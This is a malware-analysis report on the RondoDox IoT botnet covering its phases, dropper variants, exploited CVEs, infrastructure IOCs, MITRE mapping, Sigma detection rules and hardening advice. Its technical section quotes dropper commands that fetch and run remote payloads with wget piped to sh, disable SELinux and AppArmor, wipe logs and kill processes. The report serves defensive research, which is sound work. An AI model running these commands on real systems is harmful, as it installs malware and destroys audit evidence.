The network of devices that form the infrastructure for future attacks seem to be ever expanding with no rest stops.
Executive Summary
RondoDox is an actively evolving Linux-based botnet that emerged in mid-2025 and has since grown into one of the more aggressive IoT-targeting botnet campaigns since the Mirai Botnet. It is also built upon Mirai by using its source code, which became public following a string of DDoS attacks in 2016. RondoDox distinguishes itself through a systematically expanding exploit arsenal, multi-architecture payload delivery across 18 hardware targets, and deliberate elimination of competing malware on infected hosts.
Between May 2025 and February 2026, the campaign has used around 170 distinct exploits and CVEs, while conducting 15,000 exploitation attempts in a single day at its peak. Over the course of its evolution, the campaign has changed its approach from brute-force of all exploits possible on every device to using highly targeted exploits and CVEs on each device they target.
As of December 2025, the botnet even began using React2Shell (2025-55182) which is a CVSS 10, critical remote code execution vulnerability in Next.JS server components. What is interesting is that the exploit was integrated into the RondoDox botnet attacks just 3 days after it was publicly disclosed, this shows a trend of moving away from using N-day exploits to being proactive and using exploits that have in some cases not even been tagged with a CVE.
A few variants of the dropper scripts used by RondoDox were made available by threat researchers and DFIR analysts on websites like MalwareBazaar and others. These have been analysed as well emulated to get more precise execution logic as well as understand the evasion steps taken by these attacks.
1. Background and Discovery
RondoDox was first detected in honeypot activity in May 2025, with retrospective C2 log analysis confirming reconnaissance operations as early as March 2025. The campaign takes its name from artefacts embedded in the malware; all payloads are named rondo, and the email address rondo2012[@]atomicmail.io is embedded directly in dropper scripts, a notable operational security failure; or a planning setup for the future, however, not used so far.
Why does RondoDox target IoT devices?
An estimated 16.6 billion internet connected IoT devices were recorded in 2023, this number is expected to rise above 40 billion before 2030. Quite a large portion of these devices are outdated, end-of-support and sometimes even end-of-life. Poor auditing policy, not changing default credentials, lack of timely updates and upgrades along with little to no oversight in some companies, the IoT devices form the perfect internet enabled nesting space for attackers, they can be harnessed to be used for DDoS attacks, forming a botnet or even just serve as a proxy when targeting other users - this makes the largest unsecured attack surface on the planet. Botnets have been used to convert victim machines into zombie machines for various nefarious purposes for attackers while making it difficult for security teams to trace down their attacker, such a service does not go undervalued by attack groups, hence RondoDox taps into a market with immense potential, possibly already providing such services at a smaller scale.
2. Campaign Timeline
RondoDox evolved through three clearly defined operational phases, followed by a fourth phase marked by significant tactical refinement:
Phase 1: Reconnaissance (March - April 2025)
Manual vulnerability scanning targeting enterprise platforms including WebLogic, SQL injection probing, and OS command execution testing.
Phase 2: Automated Web Exploitation (April - June 2025)
Daily mass exploitation of web applications including WordPress, Drupal, and Apache Struts2. Concurrent IoT targeting began, focusing on routers and network devices through abused diagnostic command interfaces. Trend Micro recorded the first confirmed RondoDox intrusion on June 15, 2025, via CVE-2023-1389 in TP-Link Archer AX21 routers; a flaw originally demonstrated at Pwn2Own Toronto.
Phase 3: Large-Scale IoT Deployment (July - November 2025)
Dedicated RondoDox infrastructure came online. Attack volumes surged over 230% between July and August. Exploitation peaked at 49 distinct vulnerabilities in a single day on October 19, 2025, with daily attempt volumes reaching 15,000. Four distinct C2 IPs were observed across this period.
Phase 4: Targeted Precision Exploitation (December 2025 - Present)
The most significant tactical shift observed. Daily active vulnerability count dropped from ~40 to just 2 by January 2026. React2Shell (CVE-2025-55182) was added to the arsenal three days after its December 3, 2025 disclosure. The campaign now operates with hourly automated exploitation waves focused on high-conversion targets.
3. Technical Analysis
3.1 First-Stage Dropper - Variants Comparison
Two dropper variants were picked and analyzed, while RondoDox has used multiple variants, we chose two basis their time gap to understand additional steps taken as well the evolution in capabilities.
The initial infection vector remains consistent across both:
busybox wget -q0- http://<IP>/rondo.jbt.sh | sh
First-stage files follow a consistent naming pattern; rondo.xxx.sh where xxx is a three-character random string, making wildcard blocking on filename patterns straightforward. Both are 32-bit ELF LSB or MSB binaries, statically linked and stripped.
3.2 Anti-Analysis and Anti-Debug Steps
Older variant:
exec > /dev/null 2>&1
[ -t 0 ] && exit # Exit if interactive TTY detected
Newer variant:
exec > /dev/null 2>&1
trap '' SIGTTOU SIGTTIN SIGTSTP SIGHUP SIGPIPE SIGINT SIGQUIT SIGTERM
[ -z "$1" ] && exit 0 # Exit if no argument supplied
Two significant changes here. First, signal trapping is now implemented in the dropper script itself, not just the binary, meaning the delivery script cannot be interrupted via Ctrl+C, Ctrl+Z, terminal hangup, or kill during execution. Second, and more significantly, the TTY check has been replaced with an argument presence check.
The earlier TTY check was straightforward to bypass in a sandbox as we tested in an environment by setting up a cron job and sending the logs to our SIEM upon execution, however the new argument requirement means that automated sandbox detonation which typically executes a script without arguments will see a silent, clean exit and classify the sample as benign.
The argument (e.g. "react", "linksys") must be supplied by the exploit delivery mechanism itself, and it is passed through to the binary execution as the process name identifier (e.g. "react.x86_64"). This is a meaningful and deliberate anti-sandbox improvement.
The binary additionally instructs the victim to ignore signals, preventing interruption via standard kill mechanisms: SIGTTOU, SIGTTIN, SIGTSTP, SIGHUP, SIGPIPE, SIGINT, SIGQUIT, SIGTERM.
Due to these steps, the process cannot be suspended and moved to the background for management, the malware becomes immune to session teardowns including user logouts, and the standard operator toolkit for SOC analysts as well rules can no longer stop it. Hence, by raising the bar for responders the botnet has ensured it runs uninterrupted for as long as possible.
3.3 Competition Elimination
Older Variant: Extensive named-process killing (health.sh, stink.sh) with sudo fallbacks, plus /proc scanning to kill processes running from writable directories.
Newer Variant:
for p in /proc/[0-9]*; do [ ! -e "$p/exe" ] && kill -9 "${p##*/}"; done
Named competitor killing has been removed from the dropper script in the newer variant; only orphaned/zombie processes (those with no linked executable) are killed at this stage. This is likely because the competitor elimination logic has been moved into the binary itself, which FortiGuard confirms scans for named tools including wget, curl, Wireshark, gdb, cryptominers, and Redtail variants, and terminates them.
The anti-competition behaviour also extends to crontab management; the malware removes competing entries from victim crontabs, directly displacing previously installed malware including Mirai. This is not incidental: RondoDox targets devices likely already infected by other botnets and treats the existing infection base as an accessible, pre-compromised victim pool. There is a two-fold benefit to this approach, by infecting a previously infected device the actors are sure that the system is already vulnerable, additionally eliminating the competition from their current network allows RondoDox to claim monopoly in the longer run.
3.4 Security Control Disablement
setenforce 0 # Disable SELinux enforcement
service apparmor stop # Disable AppArmor
mount -o remount,rw / # Remount root filesystem as read-write
rm -rf /var/log/* /var/cache/* ~/.cache
These commands systematically remove host-based security controls before payload installation. Log and cache clearing also begins here in the newer variant, earlier in the execution chain than previously.
3.5 Writable Directory Discovery
Older Variant: Tested write access only, by creating a temp file in each candidate directory.
Newer Variant:
echo >/dev/.t && ! (grep " /dev " /proc/mounts | grep -q noexec) && cd /dev; rm -f /dev/.t
The newer variant checks both write access and whether the filesystem is mounted with the noexec flag by consulting /proc/mounts. A directory that is writable but noexec-mounted would allow file creation but silently block binary execution; causing the earlier variant to fail at execution time with no obvious error. The new implementation avoids this by filtering out noexec mounts proactively. This is a more precise and capable implementation that improves reliability on hardened embedded systems.
Candidate directories tested across both variants:
/dev, /dev/shm, $HOME, /mnt, /run/user/0, /var/log,
/var/run, /var/tmp, /data/local/tmp, /tmp
3.6 Multi-Architecture Payload Delivery; FreeBSD Added
Once a suitable directory is found, a lib subdirectory is created and architecture-specific binaries are downloaded and executed in sequence, exiting on first success.
Earlier variant download pattern:
# Download to hidden temp file
wget -O .vruftcvg http://<IP>/rondo.x86_64
cat .vruftcvg > rondo # Copy to working name (6 fallback methods)
rm -f .vruftcvg # Delete temp file
Later variant download pattern:
(wget -O- http://<IP>/rondo.x86_64 || curl ... || busybox wget -O-) > rondo
The newer variant streams directly to stdout and pipes into rondo; eliminating the intermediate hidden temp file entirely. This means no hidden dotfile artifact exists on disk during download, reducing the forensic footprint and evading filesystem-based detection tools that monitor for suspicious dotfile creation.
Architecture Targets
| Architecture | Binary | Target Devices | Later Addition |
|---|---|---|---|
| MIPS | rondo.mipsel |
Home routers (primary Mirai target) | No |
| MIPS | rondo.mips |
Routers, embedded | No |
| x86_64 | rondo.x86_64 |
Servers, PCs | No |
| ARMv4l–ARMv7l | rondo.armv4l–armv7l |
Consumer routers, IoT | No |
| PowerPC / 440fp | rondo.powerpc |
Network equipment | No |
| i686 / i586 / i486 | rondo.i686 etc. |
Legacy x86 | No |
| ARC700 | rondo.arc700 |
Embedded controllers | No |
| SH4 | rondo.sh4 |
Set-top boxes | No |
| m68k | rondo.m68k |
Motorola 68k embedded | No |
| FreeBSD AMD64 | rondo.fbsdamd64 |
FreeBSD x86-64 (NAS, appliances) | Yes |
| FreeBSD i386 | rondo.fbsdi386 |
FreeBSD 32-bit | Yes |
| FreeBSD PowerPC | rondo.fbsdpowerpc |
FreeBSD PowerPC appliances | Yes |
| FreeBSD ARM64 | rondo.fbsdarm64 |
FreeBSD ARM64 (NAS, embedded) | Yes |
The addition of FreeBSD targets underpins FreeNAS/TrueNAS storage devices, pfSense/OPNsense firewalls, and a range of embedded network appliances. This represents a deliberate expansion beyond Linux into BSD-based infrastructure, broadening the botnet's potential victim pool considerably.
3.7 Execution Logic; Exit Code 137 Check (New)
Newer Variant:
sudo ./rondo "$1.mipsel"; [ $? -eq 137 ] && exit 0
./rondo "$1.mipsel"; [ $? -eq 137 ] && exit 0
Exit code 137 equals 128 + SIGKILL(9) means the process was killed externally. If a security tool, OOM killer, or competing process terminates the binary, the script now exits entirely rather than attempting the next architecture. The earlier variant would continue iterating all architectures regardless of how the previous execution ended.
The script chooses to not create a noise in this way and smartly understands it has been detected and killed, hence it reduces its footprint and chances of triggering behavioural detection rules, by exiting.
3.8 Configuration Obfuscation
The RondoDox binary earlier encoded its configuration data, file paths, tool filenames, and C2 server addresses, using XOR obfuscation with the key 0x21. All encoded values were decrypted with this single key, hence the known XOR-decoded strings include /etc/init.d/rondo and /etc/rc3.d/S99rondo.
3.9 Persistence Mechanisms
RondoDox implements layered persistence ensuring survival across reboots even if individual mechanisms are removed:
- Init scripts: Creates
/etc/init.d/rondowith a symbolic link at/etc/rc3.d/S99rondo - Startup file injection: Appends launch commands to
/etc/rcS,/etc/init.d/rcS, and/etc/inittab - Cron persistence: Installs entries in both user and root crontabs (e.g.,
20 * * * * /path/to/rondo.sh; firing 24 times daily) - Embedded shell script: The binary contains an embedded shell script to re-establish persistence on each execution
- Binary renaming: Critical system binaries including
iptables, firewall utilities, and shutdown commands are renamed to random strings, disrupting system management and removal attempts
3.10 Post-Compromise Behaviour
On compromised endpoints, RondoDox has been observed to:
- Connect to a hardcoded, XOR-encrypted C2 and await commands
- Participate in distributed denial-of-service (DDoS) campaigns, the primary stated purpose
- Drop XMRig cryptocurrency miners (observed in a subset of infections)
- Provide proxy and residential-proxy relay services, relaying traffic through compromised consumer devices
- Scan for and terminate network utilities (
wget,curl), analysis tools (Wireshark,gdb), and competing malware (cryptominers, Redtail variants) - Disrupt firewall configuration, user account management, and shutdown operations
- Clear shell history (
history -c) prior to exit
Contact information found in tmp/contact.txt on some infected hosts:
vanillabotnet[@]protonmail.combang2012[@]protonmail.com
This contact.txt has yet to come in use anywhere as RondoDox isn't a ransomware but is instead forming a botnet, i.e. no reason to leave mail addresses within such files. Additionally, just out of precaution we chose to verify if the botnet had been advertised anywhere as a service, but found most related claims to be unfounded.
3.11 Forensic Cleanup
rm -rf rondo
rm -f rondo.*
history -c
exit 0
The newer variant formalises cleanup at script end; all rondo.* files and shell history are explicitly removed. In the earlier variant this was handled less systematically. The history -c call is standard forensic evasion, wiping the executing shell's command record.
4. Exploit Arsenal
4.1 Scale and Composition
Between May 2025 and February 2026, 174 distinct exploits were deployed. Of these, 148 mapped to known CVEs, 15 had public proof-of-concept code but no assigned CVE, and 11 had no public PoC at all, indicating original vulnerability research by the threat actor.
Nearly half of all 174 exploits were used for a single day and then discarded, reflecting a continuous test-and-select methodology.
Source: https://www.bitsight.com/blog/rondodox-botnet-infrastructure-analysis
The daily active vulnerability count peaked at 49 on October 19, 2025, before dropping sharply to just 2 by January 2026 reflecting the change in approach as talked about earlier.
4.2 Primary Vulnerability Class
Approximately 91% of the original 54 vulnerabilities exploited across 30 vendors mapped to CWE-78: OS Command Injection. This reflects the endemic failure of IoT device web interfaces to sanitise inputs, especially in NTP configurations, syslog settings, and hostname fields exposed through administrative HTTP endpoints.
4.3 Notable CVEs
- CVE-2023-1389; TP-Link Archer AX21 (Pwn2Own origin; first RondoDox intrusion June 15, 2025)
- CVE-2024-3721 and CVE-2024-12856; Initial FortiGuard-documented targets (July 2025)
- CVE-2017-9841; 38,977 exploitation attempts in October 2025 alone
- CVE-2025-62593; Exploited before its CVE was officially published
- CVE-2025-55182 (React2Shell); Critical RCE in Next.js Server Components (CVSS 10.0); added to arsenal December 6, 2025, three days after disclosure; approximately 90,300 exposed instances globally as of end-2025
- CVE-2023-46604 (Apache ActiveMQ); One of only two active exploits by January 2026
5. Infrastructure
5.1 Distribution Infrastructure
RondoDox uses compromised residential IP addresses as payload distribution nodes rather than dedicated hosting. Bitsight tracked 32 IPs across the full observation period; 16 for active exploitation, 16 for hosting; with residential nodes across North America, Europe, Asia, Africa, and South America.
Exposed services identified on residential distribution IPs included Control4 home automation interfaces, TCL Android TV webservers, and UniFi Protect camera management panels; all consistent with silently compromised consumer devices. Exploitation infrastructure additionally uses bulletproof VPS providers including Pfcloud UG, Secure Internet LLC, VPSVAULT, and 1337 Services GmbH.
This mixed model of using bulletproof VPS for active scanning and residential compromised devices for hosting makes infrastructure attribution and takedown substantially more difficult.
5.2 C2 Infrastructure
Only four distinct C2 IPs were observed between July and October 2025. C2 addresses are XOR-encrypted inside binary samples, requiring active extraction and decryption for discovery. None of the four IPs had more than nine detections on public scanning platforms, reflecting deliberate low-profile operation. C2 providers identified include OVH, YORKHOST, and Serveroffer.
A blacklisting capability actively blocks specific IPs including known researcher and sandbox IPs, from accessing payload download endpoints.
5.3 Known IOCs
| Type | Value | Source |
|---|---|---|
| IP (Distribution) | 41.231.37[.]153 |
Script dropper |
| IP (Distribution) | 14.103.145[.]202 |
New Script dropper |
| IP (Distribution) | 45.94.31[.]89 |
CloudSEK |
| IP (C2) | 83.150.218[.]93 |
CloudSEK |
| IP (C2) | 38.59.219[.]27 |
CloudSEK |
| IP (C2) | 74.194.191[.]52 |
CloudSEK |
| IP (C2) | 70.184.13[.]47 |
CloudSEK |
| IP (C2) | 5.255.121[.]141 |
CloudSEK |
| IP (C2) | 51.81.104[.]115 |
CloudSEK |
rondo2012[@]atomicmail.io |
Embedded in dropper script | |
vanillabotnet[@]protonmail.com |
tmp/contact.txt | |
bang2012[@]protonmail.com |
tmp/contact.txt | |
| Filename | rondo, rondo.* |
All variants |
| Filename | .vruftcvg, .uhecktei |
script temp download artefacts |
| Path | /etc/init.d/rondo |
FortiGuard binary analysis |
| Path | /etc/rc3.d/S99rondo |
FortiGuard binary analysis |
| Network string | rondo in HTTP requests/URI |
F5 Labs, Bitsight |
| Temp artefact | /.t files across filesystem |
Script Artifacts |
| User-Agent | Mozilla/5.0 (rondo2012[@]atomicmail.io) |
Bitsight exploit analysis |
6. Relationship to Mirai
RondoDox shares substantial code with Mirai, whose source code was published after the 2016 attack wave. This raises a natural question about coexistence on infected devices. The answer is that they do not coexist; RondoDox is designed to displace Mirai entirely, removing its crontab entries and killing its processes as part of the competitor elimination phase. The competitor-killing logic also targets RapperBot and other known IoT bots.
A second key distinction from Mirai: Mirai-infected bots themselves actively scan and exploit other systems, spreading the infection laterally. RondoDox separates these functions; scanning and exploitation are handled by dedicated attacker-controlled infrastructure, while infected bots are used exclusively for DoS operations. This division of labour allows faster iteration on the exploit arsenal without shipping new binaries into the wild.
7. Attribution Notes
The threat actor demonstrates inconsistent operational security. The email rondo2012[@]atomicmail.io is embedded in dropper scripts across multiple variants and appears in at least one exploit's User-Agent string. Additional contact emails in dropped files (vanillabotnet[@]protonmail.com, bang2012[@]protonmail.com) suggest either multiple operators or operational aliases.
Geographic distribution of scanning infrastructure spans EU and US residential ISPs, though residential IP compromise as a distribution method makes geographic attribution of operators unreliable. Exploit implementation quality varies, suggesting multiple developers or a team with differing technical proficiency.
8. MITRE ATT&CK Mapping
| Tactic | Technique Name | Observed Behaviour |
|---|---|---|
| Initial Access | T1190 - Exploit Public-Facing Application | OS command injection via router/DVR/Next.js web interfaces |
| Execution | T1059.004 - Command & Scripting Interpreter: Unix Shell | Shell script dropper; piped execution |
| Persistence/Privilege Escalation | T1053.003 - Scheduled Task: Cron | Cron persistence; competitor crontab removal |
| T1543.002 - Create/Modify System Process: Init Script | /etc/init.d/rondo, /etc/rc3.d/S99rondo |
|
| Defense Evasion | T1562.001 - Impair Defenses: Disable Security Tools | SELinux, AppArmor disabled; security utility renaming |
| T1070.003 - Indicator Removal: Clear Command History | history -c at script end |
|
| T1070.002 - Indicator Removal: Clear Linux or Mac System Logs | rm -rf /var/log/* in newer variant |
|
| T1497.001 - Virtualization/Sandbox Evasion: System Checks | Argument-check anti-sandbox ([ -z "$1" ]); signal trapping |
|
| T1140 - Deobfuscate/Decode Files | XOR key 0x21 for config decryption | |
| T1601 - Modify System Image | Filesystem remounted read-write; security binaries renamed | |
| Discovery | T1057 - Process Discovery | /proc scan to identify and kill competing malware |
| Command and Control | T1105 - Ingress Tool Transfer | Multi-architecture binary download via wget/curl/busybox |
| Impact | T1496 - Resource Hijacking | XMRig cryptominer deployment |
| T1498 - Network Denial of Service | DDoS capability via C2 command |
9. Detection Guidance
Network-Level
- Block outbound connections to all IOCs listed in Section 5.3
- Alert on HTTP requests containing
rondoin URI or User-Agent - Monitor for
busybox wgetorcurlcommands piped directly tosh - Alert on outbound connections to known cryptomining pool endpoints
- Block DNS resolution of infrastructure associated with known RondoDox providers
Host-Level
- Alert on
setenforce 0andservice apparmor stopexecution - Monitor for creation of
rondoorrondo.*files in world-writable directories - Alert on creation of
/etc/init.d/rondoor/etc/rc3.d/S99rondo - Monitor for
rm -rf /var/log/*executed by non-root or scripted processes - Alert on hidden dotfile creation (
.vruftcvg,.uhecktei) in writable directories - Monitor
auditdfor/.ttemp file creation across multiple directories in rapid succession - Alert on
trap ''signal masking combined with subsequent download activity - Monitor for scripts executing without a TTY that immediately issue
sudo killsequences
SIEM Detection Logic (Sigma-Compatible)
detection:
condition: any of them
kill_competitors:
process.name|contains:
- 'killall'
- 'pkill'
process.args|contains:
- 'health.sh'
- 'stink.sh'
disable_security:
process.cmdline|contains:
- 'setenforce 0'
- 'apparmor stop'
persistence_files:
file.path|contains:
- '/etc/init.d/rondo'
- '/etc/rc3.d/S99rondo'
c2_network:
network.destination.ip|contains:
- '41.231.37.153'
- '14.103.145.202'
- '45.94.31.89'
- '83.150.218.93'
log_wipe:
process.cmdline|contains:
- 'rm -rf /var/log'
noexec_check:
process.cmdline|contains:
- '/proc/mounts'
- 'noexec'
10. Recommendations
For IoT and Network Device Operators
- Audit all internet-exposed devices immediately, prioritising routers, DVRs, NVRs, and CCTV systems
- Change all default credentials; do not rely on vendor defaults
- Apply available firmware patches; decommission devices where vendor support has ended
- Disable remote management interfaces unless strictly required
- Segment IoT devices into dedicated VLANs isolated from production networks with egress filtering
- Audit administrative interfaces that accept freeform text in NTP server, syslog, and hostname fields; treat any device passing these fields unsanitised as vulnerable regardless of CVE assignment status
For Web Application Operators
- Patch Next.js to a version not affected by CVE-2025-55182 (React2Shell) {v5.0.5, v15.1.9, v15.2.6, v15.3.6, v15.4.8, v15.5.7 or v16.0.7} immediately; approximately 90,300 instances remained exposed as of end-2025
- Deploy WAF rules targeting command injection patterns (wget, curl, busybox, pipe operators) in HTTP parameters
- Monitor for anomalous process execution originating from web application processes (short process names matching the pattern [word].[arch])
- Replace system()/popen() patterns in administrative handlers that process user input with direct system call equivalents that do not involve a shell interpreter
For Security Operations
- Integrate the IOCs from Section 5.3 into firewall blocklists, IDS signatures, and SIEM correlation rules
- Deploy vulnerability scanners proactively; RondoDox's shift to pre-CVE exploitation means signature-based detection alone is insufficient; behavioural detection is essential
- Engage a DDoS mitigation provider given RondoDox's confirmed DoS campaign capability
- Establish patch SLAs requiring critical vulnerabilities in internet-facing applications be remediated within 72 hours
- Write WAF and proxy detection rules targeting injection patterns at the HTTP layer
11. Conclusion
RondoDox might aim to be the next biggest botnet network and its rapid progress in such a short time is a testament to its efforts and capabilities. The quick pivot from the brute shotgun approach to targeted vulnerabilities shows that the attack group has already gained foothold and is now choosing to expand further while not generating significant detections and alerts. Additional steps that have been taken to make the malware more stealthy show an improvement in the approach as well as sophistication in anti-analysis and anti-sandboxing.
IoT devices have contributed to large scale DDoS attacks in the past and are used throughout as proxies to help evade a large portion of the security teams, as such it is important to keep these attackers in check and not allow them to build an infrastructure that may make it harder to detect their attacks in the future. The steps taken by RondoDox and as shown above should help keep this botnet in check, even while it takes hold of devices which have been previously infected, stopping the spread of the botnet to newer devices should allow for a reduction in the overall attack surface of botnets in general.
References
- Bitsight; RondoDox Botnet: From Zero to 174 Exploited Vulnerabilities
- F5 Labs; Tracking RondoDox: Malware Exploiting Many IoT Vulnerabilities
- FortiGuard Labs; RondoDox Unveiled: Breaking Down a New Botnet Threat
- CloudSEK TRIAD; Botnet Loader-as-a-Service Infrastructure Distributing RondoDox and Mirai Payloads
- CloudSEK; RondoDox Botnet Weaponizes React2Shell
- The Hacker News; RondoDox Botnet Exploits Critical React2Shell Flaw
- Trend Micro ZDI; RondoDox Botnet Unleashed: New Malware Uses Exploit Shotgun
- SecurityWeek; RondoDox Botnet Targeted 174 Vulnerabilities
- Dark Reading; RondoDox Botnet Expands Scope With React2Shell Exploitation Security Affairs; RondoDox Botnet Expands Arsenal Targeting 174 Flaws
- ANY.RUN; RondoDox Malware Overview
- GBHackers; RondoDox Botnet Grows To 174 Exploits With Large-Scale Residential IP Abuse
- Primary dropper script analysis; .sh files
- Online script execution test: *
https://app.any.run/tasks/4cbe123b-3f85-4c4d-b0b0-0ff45e37070c?p=69d35af2030affa9366db563*